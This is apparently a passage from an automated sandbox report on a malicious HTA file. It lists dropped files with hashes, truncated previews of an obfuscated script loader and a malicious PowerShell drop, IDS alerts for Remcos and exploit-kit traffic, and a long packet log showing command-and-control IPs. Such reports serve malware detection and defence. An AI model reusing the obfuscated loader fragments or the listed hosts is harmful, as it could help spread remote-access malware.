                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):15728640
                                                                                Entropy (8bit):0.10106922760070924
                                                                                Encrypted:false
                                                                                SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                Malicious:false
                                                                                Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Preview:..
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):195828
                                                                                Entropy (8bit):3.734264769577845
                                                                                Encrypted:false
                                                                                SSDEEP:3072:yf2mvbW2RjvThlXRy/cgt5p4Gw2G2oir8/pvRecjDbHxic87:yfRvN9Th2/4BRecjDbHxU7
                                                                                MD5:9A8FFC29C5835F0DAE8EA49BFB6BF29D
                                                                                SHA1:1785396F191852732BC80AB9819D03905BD9F971
                                                                                SHA-256:DD3A11A501E3394E12D7FD48EE9A58FA2AA477B059F9DA5B4FF20D9C9EA84686
                                                                                SHA-512:8562AE76F5C2D41A64C01E99006E55E45A51F525B7E390B0563A5ECC48DF8334B0A8B205395C93EF9C811F5CA8A04A114AE2C58EAAC30FC2EAA150712096E168
                                                                                Malicious:true
                                                                                Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .i.x.o.r.a.(.s.i.g.m.a.t.i.s.m.o.,. .t.r.i.c.o.d.e.s.m.o.,. .a.c.a.t.a.m.e.n.t.o.,. .p.a.i.a.n.a.s.,. .o.r.d.e.n.a.d.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.a.s.e.(.
                                                                                File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                Entropy (8bit):2.531936731236095
                                                                                TrID:
                                                                                • HTML Application (8008/1) 100.00%
                                                                                File name:nicetokissthebestthingsiwantotgetmebackwith.hta
                                                                                File size:133'265 bytes
                                                                                MD5:b581033fd1ba02c7724802d3ccda9b5b
                                                                                SHA1:ad4484b11cfd436200542cc8e4fbaebcb7491bf8
                                                                                SHA256:008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4
                                                                                SHA512:12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47
                                                                                SSDEEP:192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX
                                                                                TLSH:C7D3B282EA3549ECB3CC5E93BEFC7BAD3569134F93062E92834B3416CC5675CA48006E
                                                                                File Content Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%25252
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-17T16:04:52.474984+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.108.133443192.168.2.549706TCP
                                                                                2024-10-17T16:04:57.255571+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11107.175.229.13880192.168.2.549715TCP
                                                                                2024-10-17T16:04:57.255571+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11107.175.229.13880192.168.2.549715TCP
                                                                                2024-10-17T16:05:01.100829+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549721192.169.69.269674TCP
                                                                                2024-10-17T16:05:03.125743+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549724192.169.69.269764TCP
                                                                                2024-10-17T16:05:06.091751+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549727192.3.101.1539764TCP
                                                                                2024-10-17T16:05:14.511060+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549714TCP
                                                                                2024-10-17T16:05:22.355388+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549730192.3.101.1539764TCP
                                                                                2024-10-17T16:05:22.831414+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549731178.237.33.5080TCP
                                                                                2024-10-17T16:05:52.938851+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549931TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 17, 2024 16:04:39.170975924 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:39.208720922 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:39.211405039 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:39.211605072 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:39.476032972 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:39.783494949 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:40.215755939 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:40.215812922 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:40.392834902 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:40.434628963 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063677073 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063755989 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063760042 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.063766003 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063776970 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063788891 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063801050 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.063801050 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063811064 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.063813925 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063855886 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.063985109 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.063996077 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.064007044 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.064021111 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.064040899 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.101548910 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.101607084 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.101737976 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.101778030 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.214709044 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.214808941 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.214870930 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.214912891 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.215827942 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.215876102 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.216042995 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.216084957 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.218549967 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.218600988 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.218894958 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.218933105 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.220654011 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.220699072 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.220774889 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.220813036 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.222970963 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.223041058 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.223306894 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.223351002 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.225374937 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.225436926 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.225631952 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.225675106 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.227915049 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.227971077 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.228053093 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.228092909 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.230304956 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.230362892 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.230508089 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.230551004 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.232614994 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.232666016 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.232764006 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.232805967 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.235125065 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.235174894 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.235238075 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.235279083 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.237499952 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.237552881 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.237660885 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.237699032 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.252028942 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.252087116 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.252181053 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.252221107 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.367721081 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.367829084 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.372236967 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.372303009 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.372468948 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.372515917 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.373097897 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.373145103 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.373214960 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.373260975 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.375057936 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.375108004 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.375233889 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.375279903 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.377010107 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.377062082 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.377290964 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.377337933 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.378895998 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.378945112 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.378950119 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.378985882 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.380767107 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.380814075 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.380860090 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.380896091 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.382661104 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.382709980 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.382764101 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.382801056 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.384485960 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.384533882 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.384984016 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.385031939 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.386440039 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.386631012 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.386657953 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.386712074 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.388330936 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.388420105 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.388676882 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.388736010 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.390238047 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.390317917 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.390393972 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.390458107 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.392167091 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.392205954 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.392235994 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.392291069 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.394062042 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.394115925 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.394407988 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.394459963 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.396653891 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.396665096 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.396716118 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.408360958 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408373117 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408385038 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408396006 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408407927 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408420086 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.408482075 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.409054995 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.409110069 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.409168005 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.409215927 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.410928965 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.410944939 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.410984993 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.412828922 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.412882090 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.413110971 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.413161039 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.414794922 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.414864063 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.414906979 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.414966106 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.419368982 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.419440985 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.420037985 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.420089960 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.420150042 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.420191050 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.421752930 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.421806097 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.422041893 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.422091961 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.502640963 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.502728939 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.502907991 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.502957106 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.503087044 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.503099918 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.503132105 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.503158092 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.503899097 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.503958941 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.504195929 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.504246950 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.504884005 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.504895926 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.504947901 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.505398035 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.505449057 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.505539894 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.505584002 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.506195068 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.506259918 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.506553888 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.506602049 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.507100105 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.507148981 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.507155895 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.507199049 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.507805109 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.507854939 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.507960081 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.508002996 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.508532047 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.508600950 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.508676052 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.508719921 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.509342909 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.509355068 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.509393930 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.510224104 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.510235071 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.510278940 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.510896921 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.510943890 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.511120081 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.511167049 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.511651039 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.511699915 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.511821032 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.511868000 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.512429953 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.512475967 CEST4970480192.168.2.5107.175.229.138
                                                                                Oct 17, 2024 16:04:41.512819052 CEST8049704107.175.229.138192.168.2.5
                                                                                Oct 17, 2024 16:04:41.512864113 CEST4970480192.168.2.5107.175.229.138
